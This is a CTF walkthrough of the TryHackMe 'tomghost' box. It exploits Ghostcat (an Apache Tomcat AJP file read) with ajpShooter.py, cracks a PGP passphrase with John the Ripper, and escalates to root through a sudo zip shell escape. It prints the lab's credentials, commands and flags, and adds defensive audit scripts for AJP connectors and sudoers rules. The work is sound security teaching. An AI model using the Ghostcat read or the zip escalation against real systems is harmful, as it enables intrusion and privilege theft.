In this CTF (Capture the Flag) challenge walkthrough, we will be hacking into an Apache Tomcat server using an exploit created by a Chinese developer.
This exploit is available as a standalone Python file and as a Metasploit module.
In the walkthrough video, I'll demonstrate both methods of gaining an initial foothold into the box. We will use a trusty hash cracking tool, John the Ripper, to recover a password from two files found on the target machine.
Logging in as the second user, we can leverage our sudo permissions to run the zip binary as root in order to retrieve the root flag.
Please note that this box contains a username with foul language. If you are easily offended by bad words, please don't continue reading this walkthrough.
ENUMERATION

First, let's export our IPs and enumerate with nmap.
export myIP=10.6.2.23
export targetIP=10.10.225.99
sudo nmap -Pn -sC -p- -O $targetIP

Next we will look further into the port 8009 service, ajp13, with some searching on Google. We quickly discover that it looks like an Apache Tomcat server with a vulnerability that can be exploited with Ghostcat.
INITIAL FOOTHOLD WITH GHOSTCAT
Using Metasploit with the Ghostcat module, we can retrieve the first user's username and password. Also of interest is port 8080 running an HTTP proxy. This is probably a webpage we can look at in a browser.
The other method for retrieving the first username and password is to run the following command to use ajpShooter.py directly without Metasploit:
python ajpShooter.py http://10.10.176.124:8080 8009 /WEB-INF/web.xml read

[ajpShooter ASCII-art banner]
00theway,just for test

[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"1261-1583902632000"
[<] Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT
[<] Content-Type: application/xml
[<] Content-Length: 1261

<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
	skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>
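The file read above works because the AJP connector on port 8009 answers unauthenticated requests from any host. On the defensive side, the fix Apache recommends is to bind the connector to loopback (or disable it) and require a shared secret. The following audit script is an added example written for this walkthrough, not code from the original post or from the ajpShooter project; it parses a Tomcat server.xml and reports AJP connectors that are missing either control. Both server.xml samples are constructed for the example.

```python
# Added example (not part of the original walkthrough): audit a Tomcat
# server.xml for AJP connectors that would accept AJP traffic from remote
# hosts without a shared secret. The sample configurations are constructed.
import xml.etree.ElementTree as ET

# Constructed: an AJP connector with no address binding and no secret.
WEAK_SERVER_XML = """\
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>
"""

# Constructed: the same server with the AJP connector bound to loopback and
# a shared secret required, as Tomcat's hardening guidance recommends.
HARDENED_SERVER_XML = """\
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="replace-with-a-long-random-value"
               redirectPort="8443"/>
  </Service>
</Server>
"""

LOOPBACK_ADDRESSES = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding per AJP connector: {"port": ..., "issues": [...]}.

    An empty "issues" list means the connector passed both checks.
    """
    root = ET.fromstring(server_xml)
    findings = []
    for conn in root.iter("Connector"):
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue  # only AJP connectors are in scope
        issues = []

        # Check 1: the connector should only listen on loopback. Older Tomcat
        # releases default to all interfaces when "address" is not set.
        address = conn.get("address")
        if address is None:
            issues.append("no address attribute; older releases bind all interfaces")
        elif address not in LOOPBACK_ADDRESSES:
            issues.append("bound to non-loopback address %r" % address)

        # Check 2: a shared secret should be required and actually configured.
        secret_required = conn.get("secretRequired", "").lower()
        secret = conn.get("secret", "")
        if secret_required != "true" or not secret:
            issues.append("shared secret not required or not set")

        findings.append({"port": conn.get("port"), "issues": issues})
    return findings


def is_hardened(server_xml: str) -> bool:
    """True when every AJP connector in the config passes both checks."""
    return all(not f["issues"] for f in audit_ajp_connectors(server_xml))


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        for finding in audit_ajp_connectors(cfg):
            print(label, "port", finding["port"], finding["issues"] or "OK")
```

Run it against a real server.xml by reading the file into `audit_ajp_connectors`; if no component on the host actually needs AJP (for example no front-end httpd using mod_jk or mod_proxy_ajp), removing the connector altogether is simpler than hardening it.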
SSH INTO THE TARGET MACHINE

Now that we have retrieved the user:password, we can go ahead and SSH into the box.
ssh skyfuck@10.10.176.124
Password: 8730281lkjlkjdqlksalks
During further enumeration, we discovered two files: tryhackme.asc and credential.pgp. These files will probably help us uncover another hidden string. The .pgp file contains a hash that, when cracked, reveals a key to decrypt the .asc file.
First, we need to transfer both files to our attacker machine so that we can use John the Ripper to crack the hash. We can use SCP (secure copy protocol) to transfer the files.
The following commands allow us to uncover the hidden string, which turns out to be another username:password combination.
sudo scp skyfuck@10.10.91.141:/home/skyfuck/credential.pgp ~/THM/tomghost/credential.pgp
sudo scp skyfuck@10.10.91.141:/home/skyfuck/tryhackme.asc ./tomghost/tryhackme.asc
DECRYPTING THE HIDDEN SECRET WITH JOHN THE RIPPER

On our attacker machine we can run gpg2john (the John the Ripper helper for PGP keys) to convert the .asc file into a new file packed up for John the Ripper, titled "hash".
gpg2john tryhackme.asc > hash
And finally, we can run John the Ripper against the hash to recover the passphrase needed to decrypt the credential.pgp file.
john --wordlist=/home/kalisurfer/hacking-tools/SecLists/Passwords/Leaked-Databases/rockyou/rockyou.txt hash
The rockyou.txt file is a leaked database of passwords that is often used in pentesting. Once we crack the hash, we will use the following commands to decrypt the credential.pgp file.
gpg --import tryhackme.asc
sudo gpg --decrypt credential.pgp
And we have it!
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
!!! THM{GhostCat_1s_so_cr4sy} !!!
EXPLOITING SUDO PERMISSIONS ON ZIP
First, we need to switch over to the user merlin with:
su merlin
We discover with a sudo -l search that we have sudo permissions to run the zip binary.
Over on GTFOBins we find a privilege escalation vector that uses zip's test option to spawn a shell under sudo, which lets us retrieve the root flag:
merlin@ubuntu:/usr/bin$ TF=$(mktemp -u)
merlin@ubuntu:/usr/bin$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# whoami
root
# cd /root
# ls
root.txt  ufw
# cat root.txt
THM{Z1P_1S_FAKE}
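The escalation only works because the sudoers rule lets merlin run zip as root with any arguments. As an added example (not code from the original walkthrough or from GTFOBins), the script below parses sudoers-style rules and flags those that grant root execution of zip with unrestricted arguments; the sample rules are constructed, and the set of binaries to review contains only zip because that is the one this box uses.

```python
# Added example (not part of the original walkthrough): flag sudoers rules that
# let a user run zip as root without argument restrictions. The sample rules
# below are constructed for this example.
import re

# Constructed sudoers content; the merlin line is the shape of rule this box has.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
merlin ALL=(root:root) NOPASSWD: /usr/bin/zip
backup ALL=(root) NOPASSWD: /usr/bin/zip -r /var/backups/home.zip /home
www-data ALL=(root) /usr/bin/systemctl restart tomcat9
"""

# Binaries whose root sudo rules deserve review; only zip is on the page.
REVIEW_BINARIES = {"zip"}

# user host=(runas) [TAG: ...] command[, command ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text: str) -> list:
    """Parse simple sudoers rules into dicts (comments and Defaults are skipped)."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # "(root:root)" -> runas user "root"; no runas group means root.
        runas = (m.group("runas") or "root").split(":")[0].strip()
        for cmd in m.group("cmds").split(","):
            parts = cmd.strip().split()
            rules.append({
                "user": m.group("user"),
                "runas": runas,
                "nopasswd": "NOPASSWD:" in m.group("tags"),
                "command": parts[0],
                "args": parts[1:],
            })
    return rules


def risky_rules(text: str) -> list:
    """Rules that run a reviewed binary as root with no fixed argument list."""
    out = []
    for rule in parse_sudoers(text):
        name = rule["command"].rsplit("/", 1)[-1]
        if rule["runas"] in ("root", "ALL") and name in REVIEW_BINARIES and not rule["args"]:
            out.append(rule)
    return out


if __name__ == "__main__":
    for rule in risky_rules(SAMPLE_SUDOERS):
        print("review:", rule["user"], "may run", rule["command"], "as", rule["runas"],
              "with any arguments", "(NOPASSWD)" if rule["nopasswd"] else "")
```

The backup rule in the sample is the shape to prefer: a fixed argument list means sudo will refuse the `-T -TT` invocation shown above. On a real host, feed the script the output of `sudo -l` style rules or the contents of /etc/sudoers and /etc/sudoers.d rather than the constructed sample.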
Thanks for reading/watching my walkthrough. Also make sure to check out my other TryHackMe tutorials:
Recommended: TryHackMe – Capture the Flag Mr. Robot

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.